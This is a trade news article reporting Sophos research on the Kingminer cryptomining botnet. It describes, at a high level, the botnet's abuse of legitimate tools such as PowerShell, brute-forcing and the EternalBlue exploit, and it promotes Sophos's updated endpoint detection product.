Kingminer botnet combines sophisticated techniques alongside cut-and-paste & legitimate tools

News by Andrew McCorkell

A combination of sophisticated techniques and copy-paste tactics are being used by cybercriminals, along with legitimate tools, in-depth research from Sophos about botnet Kingminer demonstrates.

Kingminer botnet attackers are using legitimate tools such as Powershell, Wscript and Bitsadmi. It means that being able to query how legitimate tools are used and are interacting with each other is now a necessary defence technique against the attacks built on abusing legitimate components.

The State of Ransomware 2020 report from Sophos, shows that almost a quarter of organisations breached by these attacks were able to detect the ransomware intrusion and stop it before encryption of data.

Paul Ducklin, principal research scientist at Sophos on illicit cryptomining commented: "The Kingminer attackers aren't really concerned with innovation but with adaptation, meaning that they take existing malicious techniques and tools and tweak them or combine them to blend in for as long as possible.

“Illicit cryptomining follows a simple underlying equation: the longer the criminals go unnoticed, the longer they mine, and thus the more money they make. Unlike a ransomware attack, which involves careful preparation followed by an assault you can't fail to notice, criminal cryptomining is about being an unseen, electricity-eating parasite for as long as you can."

In-depth research from Sophos about the opportunistic botnet – Kingminer shows:

  • Cybercriminals are using a combination of sophisticated techniques and copy-paste tactics
  • Attackers are relying more on legitimate tools such as Powershell, Wscript and Bitsadmin to live off the land, so being able to query how legitimate tools are used and interact with each other is a necessary defence technique against the attacks built on abusing legitimate components
  • Kingminer shares many of the attributes of advanced ransomware attacks. In the  State of Ransomware 2020 report, almost a quarter (24 percent) of organisations breached by these ransomware attacks were able to detect the ransomware intrusion and stop it before it was able to encrypt their files.

Sophos has announced an updated version of its Endpoint Detection and Response (EDR), which it describes as 'the most significant product upgrade ever done by Sophos.'

Sophos’ EDR now includes new Live Discover and Response capabilities to quickly identify and neutralise evasive threats and proactively maintain IT operations, as well as allowing organisations to search for past and current indicators of compromise.

Ryan Miller, chief information security officer, Mission Search said: “Sophos EDR is a force multiplier that gives me the tools I need to do the job of an entire team without adding additional headcount.

“This new version drastically reduces the time it takes to detect and respond to incidents, saving me on average four to five hours per day. Easy to use SQL queries simplify the previously complex and time-intensive process of investigating suspicious activity, and allow me to perform searches that are completely unique to my network.

“As the chief information security officer of a Joint Commission certified healthcare staffing firm, I am extremely sensitive to any time delays in receiving warnings related to suspicious activity that could be a precursor of a malicious attack designed to obtain sensitive data.”

Gabor Szappanos, threat research director at Sophos said the world of cybercriminals is a "heterogeneous mass" with many different competence and resource levels among them.

Understanding these varying capabilities is very important for preparing defensive actions.

Szappanos added that the operators of the Kingminer botnet are ambitious and capable, but don’t have endless resources – they use any solution and concept that is freely available, from public domain tools to the techniques used by advanced persistent threat groups.

He said: “This is a classic example of a lower rung cybergang unit copying an APT- style attack - in this case, a Chinese APT attack method - and using it as a blueprint for Kingminer. Sophos has talked about how some cybercriminals use other attacks as blueprints, and this is evidence that the trend is continuing, if not becoming more persistent, because it is cost-effective and proven.

“Many parts of the Kingminer attack are orchestrated using legit or greyware applications and PowerShell scripts. For defenders, this is where application control and other EDR features that detect suspicious ‘Living off the Land’ activity, as well as AMSI detections, can play a huge role.”

Sophos published its new research, An Insider View into the Increasingly Complex Kingminer Botnet, showing how the use of servers in carrying out attacks and the importance of threat intelligence in detecting such activity.

A Kingminer botnet tries to gain server access by brute-forcing login credentials, uses the EternalBlue exploit to spread malware among other attack mechanisms, Sophos found.

Dan Schiappa, chief product officer, Sophos said that cybercriminals are raising the stakes, stopping at nothing to capitalise on expanded attack surfaces as organisations increasingly move to the cloud and enable remote workforces.

Schiappa said: “Servers and other endpoints are all too insufficiently protected, creating vulnerable entry points that are ripe for attackers to exploit."

Find this article useful?

Get more great articles like this in your inbox every lunchtime

Video and interviews